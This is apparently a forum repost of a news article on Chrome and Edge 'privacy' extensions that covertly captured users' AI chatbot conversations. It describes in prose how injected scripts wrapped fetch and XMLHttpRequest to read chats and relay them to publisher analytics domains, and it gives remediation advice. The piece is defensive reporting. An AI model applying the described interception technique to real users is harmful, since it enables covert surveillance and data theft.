Privacy breach: Chrome and Edge extensions secretly harvest AI conversations

  • Thread Author
Security researchers have uncovered a startling privacy breach in plain sight: several widely used Google Chrome and Microsoft Edge extensions — marketed as privacy and security tools — were quietly intercepting users’ conversations with AI assistants and sending those chats to third parties for commercial use. The discovery, published by Koi Security and rapidly corroborated by independent outlets, shows the behavior was embedded in the extensions by default, deployed via an update in July 2025, and active for months while the extensions continued to carry store “Featured” badges that gave users a false sense of trust.

Dark cyberpunk laptop screen shows AI chat options and an 8M+ Injected data motif.Background​

The issue came to light when the security firm Koi used an automated risk engine to scan browser extensions for hidden capabilities to read and exfiltrate data from AI chat platforms. The research points to a cluster of extensions (most notably Urban VPN Proxy and sibling products from the same publisher) that hook into browser pages for major AI services — including ChatGPT, Gemini, Claude, Microsoft Copilot, Perplexity, Grok (xAI), DeepSeek, and Meta AI — and capture full conversation traffic: prompts, responses, timestamps, conversation IDs, session metadata, and platform/model identifiers. Koi’s technical analysis documents how the extensions inject platform-specific scripts to intercept traffic and relay it to remote analytics endpoints. The scale is significant: Koi and multiple reports estimate the combined user base across the affected Chrome and Edge extensions totals more than eight million installs, with Urban VPN Proxy alone reaching roughly six million Chrome users and over one million Edge users. That user count and the Featured status of these extensions raised immediate concerns about marketplace review processes and the reliability of the trust signals consumers rely on when installing browser add-ons.

How the harvesting worked: a technical breakdown​

Script injection and API interception​

According to the researchers, the extensions continually monitor open browser tabs and, when a user opens a targeted AI site, inject a dedicated “executor” JavaScript for that platform (for example, chatgpt.js, gemini.js, claude.js). These injected scripts wrap or override core browser network APIs — notably fetch and XMLHttpRequest — allowing them to see requests and responses in the page context before the content is rendered to the user. The scripts parse messages and metadata, package conversation data, and forward it via window.postMessage to the extension’s background worker for exfiltration. This technique is powerful because it operates entirely inside the page context. Even though the underlying network traffic uses TLS, the scripts execute where decrypted content has already been made available to the page, so they can extract the conversational text and metadata the moment it arrives. Koi’s write-up describes the flow in four stages: detection (tab monitoring), injection, parsing/packaging, and exfiltration.

Exfiltration and analytics endpoints​

Captured data was reported to be compressed and transmitted to remote endpoints under the publisher’s control, specifically to domains such as analytics.urban-vpn.com and stats.urban-vpn.com, according to the Koi analysis. The content flagged for exfiltration includes every prompt and AI response, conversation identifiers, timestamps, session attributes, and information about which AI model and platform were used. That dataset is particularly sensitive given how candid users often are when interacting with AI assistants.

No opt-out; default-on harvesting​

Crucially, the harvesting functionality was enabled by default and hard-coded into the extensions’ builds. That meant users had no practical setting to turn off the collection; the only way to stop it was to uninstall the extension. Koi’s timeline shows the collection behavior was added in a July 2025 update (identified as version 5.5.0) and was distributed via browser auto-update mechanisms.

Scope and scale: who and what was affected​

  • Affected products included Urban VPN Proxy (Chrome and Edge), 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker from the same publisher. Combined installs on Chrome and Edge exceeded eight million users.
  • Targeted AI platforms spanned the major commercial services that users rely on for personal and professional assistance: ChatGPT, Gemini, Claude, Microsoft Copilot, Perplexity, DeepSeek, Grok (xAI), and Meta AI. The publisher implemented a unique executor script for each platform, which shows intentional targeting rather than an accidental code bug.
  • The data collected included full conversational content and sensitive metadata — a dataset that could contain medical questions, financial details, proprietary code, credentials or business secrets typed into AI chat windows. Koi advised users to assume that any AI conversations conducted after the July 2025 update may have been captured and shared.

Store approval, trust signals, and the marketplace gap​

One of the more alarming facts of the investigation is that nearly all the affected extensions carried the Chrome Web Store or Microsoft Edge “Featured” badge — a designation many users interpret as a manual stamp of quality and safety. Koi’s findings and subsequent reporting emphasize how reliance on such store badges can be dangerously misleading when runtime behavior is not thoroughly validated during review. Google’s own developer documentation and program policies include a Limited Use policy that constrains how extensions may collect, use, and — crucially — transfer user data. The policy explicitly forbids transferring or selling user data to third parties such as data brokers or information resellers, and requires that data collection be limited to clearly disclosed, single-purpose functionality. If an extension shared AI prompt/response data with an affiliate “data broker” for marketing analytics, that behavior would appear to violate the Limited Use policy. At least two important gaps emerge from the public record: first, static listing review (checking UI assets, permissions, and a privacy policy) is insufficient to detect malicious runtime behavior; and second, automated or manual review processes appear to have failed to detect injected platform-specific code that executed only when particular AI sites were loaded. Multiple technical and editorial reports note the paradox of Featured badges applied to extensions that were covertly exfiltrating highly sensitive data.

Privacy, legal and commercial implications​

The publisher’s privacy policy — as flagged by Koi — contains language describing data sharing with an affiliated data broker and mentions AI inputs and outputs as part of collected “browsing data.” That disclosure, while buried and not obviously presented to users, does indicate that the developer intended to monetize collected browsing and AI data. Whether the data was actively sold to identifiable third-party buyers, or merely shared with an affiliated analytics partner, is less clearly documented in public reporting. That distinction matters legally and operationally, and should be treated with caution until direct proof of downstream sales or identifiable purchasers emerges. From a regulatory perspective, multiple issues could be implicated:
  • Violation of platform rules: Chrome Web Store’s Limited Use policy explicitly forbids transferring user data to advertising platforms, data brokers, or resellers without proper constraints; similar rules apply for Microsoft Edge. If the publisher transferred AI chats to a data broker for marketing analytics, that may contravene store policies.
  • Consumer protection and privacy law: Depending on jurisdictions and the nature of the data (for example, health or financial information), regulators could view undisclosed mass harvesting of AI conversations as unfair or deceptive conduct under privacy and consumer protection statutes.
  • Contract and corporate risk: Enterprises that allow unmanaged extensions into employee browsers may face data leakage that violates confidentiality obligations or regulatory requirements like HIPAA or PCI when sensitive data is exposed.
Because aggregated AI chats can contain highly personal or confidential information, the commercial exploitation of this data is a serious privacy harm even if the exact monetization chain is not fully mapped in public reporting. Multiple independent outlets report the same basic privacy policy language and the same Koi technical findings, strengthening the factual basis for concern while underscoring that the presence of downstream buyers has not (as of the public reporting) been independently enumerated.

Enterprise risk: why IT teams need to act now​

Browser extensions are a known vector for data exfiltration and privilege escalation — and this case demonstrates how a seemingly innocuous “privacy” or “ad block” extension can become an active surveillance mechanism. For organizations, the exposure risk is twofold:
  • Direct data leakage: Employees who use infected browsers for professional work could inadvertently leak trade secrets, customer PII, source code, or sensitive operational details via AI queries to external parties.
  • Third‑party access and lateral risk: Extensions with broad permissions can act as long-lived agents inside a corporate environment, making detection difficult and enabling collection over time.
Enterprise defensive guidance already includes extension management as a best practice. Administrators should implement policy-driven controls such as allowlists, blocklists, and forced installations of vetted security extensions, leveraging browser management features and group policy. Microsoft and Google both provide enterprise controls that allow organizations to block all extensions by default, allow only a curated set, or force-install necessary tools. These management capabilities are part of standard corporate hardening guidance and should be included in incident response planning.

Practical remediation checklist for users and IT admins​

Security teams and everyday users must respond differently but urgently. The following steps synthesize the technical findings and practical controls that reduce exposure.
For individual users:
  • Uninstall any of the affected extensions immediately. Koi explicitly recommends removal and to assume conversations may have been captured since the July 2025 update.
  • Review AI conversations you’ve had while the extension was installed; assume anything sent since July 9, 2025 could be in third-party hands and treat it as compromised.
  • Rotate credentials and secrets that may have been included in AI prompts (API keys, passwords, personal identification numbers) and enable multi-factor authentication where possible.
  • Disable or remove non-essential extensions and prefer open-source or enterprise-vetted tools when available.
For IT administrators and security teams:
  • Audit installed extensions across endpoints and identify any occurrences of the affected extension IDs. Koi published extension IDs and indicators useful for scanning.
  • Implement a default-deny extension posture: configure ExtensionInstallAllowlist or ExtensionInstallBlocklist via Group Policy, Microsoft Intune, or Google Chrome Browser Cloud Management to restrict installations to a curated set.
  • Force a credential rotation policy and require immediate resetting of service credentials used in browsers or pasted into AI chats where possible.
  • Use endpoint detection and response (EDR) tooling and browser telemetry to hunt for suspicious domains, unusual outbound connections, or the specific analytics endpoints reported (for example, the Urban VPN analytics domains identified by Koi).
  • Educate staff about the risks of running “privacy” extensions on corporate devices and enforce separation of browser profiles for sensitive tasks.
These steps prioritize containment and assume compromise; when large-scale data capture is possible, presuming exposure is a safer operational posture than hoping the privacy policy limited downstream use. Koi and multiple reporting outlets urge immediate uninstallation and remediation actions for affected users.

Marketplace responsibility and technical verification gaps​

This incident highlights two structural problems in extension ecosystems:
  • Review limitations: Store review processes primarily validate listings against static criteria (UI assets, manifest permissions, privacy policy presence) and cannot easily simulate all runtime behaviors — especially when extensions inject platform-specific executor scripts only when certain web pages are loaded. The use of dynamic, targeted injection makes detection during a one-off review much harder.
  • Overreliance on trust indicators: Badges like “Featured” or “Established publisher” are helpful for surfacing quality extensions but are not guarantees of runtime safety. The presence of those badges on extensions that were shown to be harvesting AI conversations reveals a gap between perceived and actual trustworthiness.
A stronger review posture will require blended approaches: automated dynamic analysis that exercises extensions against widely used web apps (including AI services), periodic runtime scans of published extensions, and clearer policy enforcement — particularly around the Limited Use constraints that restrict third-party transfers of sensitive user data. Google’s Limited Use policy already prohibits transferring or selling user data to data brokers, and this incident underlines why enforcement must be operationally tighter.

What regulators and platform owners should consider​

  • Mandate runtime behavioral testing for extensions that hold broad permissions, using automated sandbox environments to simulate interactions with popular web apps and AI platforms.
  • Require clearer, prominent disclosures at install time when an extension will collect or share AI prompt/response content — not buried traces in a long privacy policy.
  • Enforce stricter penalties and rapid takedown for extensions found to be sharing user data with data brokers, including mandatory audits of any affiliated analytics firms named in privacy policies.
  • Expand marketplace transparency by exposing publisher verification details and the date/reason for any Featured or trusted badges so users can assess the strength of the endorsement.
These interventions would close gaps that allow “privacy” products to monetize sensitive conversational data with limited user comprehension or explicit consent.

Caveats and unresolved questions​

  • Direct evidence of third-party purchases of harvested AI conversations has not been independently enumerated in public reporting; Koi’s analysis documents the capture and the publisher’s privacy-policy language about sharing with an affiliated data broker, but public records do not yet list identifiable buyers or downstream datasets. That means claims that data was “sold” should be treated with careful language until sales contracts or buyer records are confirmed. Koi and corroborating outlets report that the privacy policy permits disclosure to an affiliated data broker for marketing analytics, which is of material concern even absent verified buyers.
  • The precise retention and deletion practices for captured conversations on the publisher side are not publicly demonstrable; users and defenders should therefore assume retention until proven otherwise and act accordingly.

The bottom line: treat AI chats as potentially exposed and lock down the browser​

This incident is a stark reminder that browsers and their extension ecosystems are high-risk surfaces for data leakage. Extensions marketed as privacy tools can — and in this case did — become surveillance tools when runtime behavior is not fully vetted and when privacy policies hide commercial uses behind dense legal language. Users should uninstall affected extensions and rotate secrets used in chats; enterprises should enforce allowlists, monitor for suspicious telemetry, and update incident-response plans to treat browser-based AI inputs as potentially compromised.
Marketplaces must do more than check boxes and screenshots: they must verify runtime behaviors for extensions with broad permissions, make disclosures clearer at installation time, and enforce the Limited Use rules that prohibit selling user data to data brokers. Only a coordinated approach — involving platform engineering, security research, enterprise controls, and possibly regulators — can prevent future cases where “privacy” tools quietly betray the users they claim to protect.
The threat vector exposed here is straightforward and solvable, but the cure requires sustained action: rigorous runtime analysis in store reviews, mandatory transparency at install time, and enterprise controls that remove the ability for untrusted extensions to run in sensitive contexts. In the meantime, the safest course is immediate removal of the implicated extensions, a presumption of compromise for any AI chats conducted since July 2025, and a rapid program of credential rotation and policy-driven extension management across corporate endpoints.
Source: ProPakistani These Google Chrome and Microsoft Edge Extensions Are Selling Your Private Data
 

Back
Top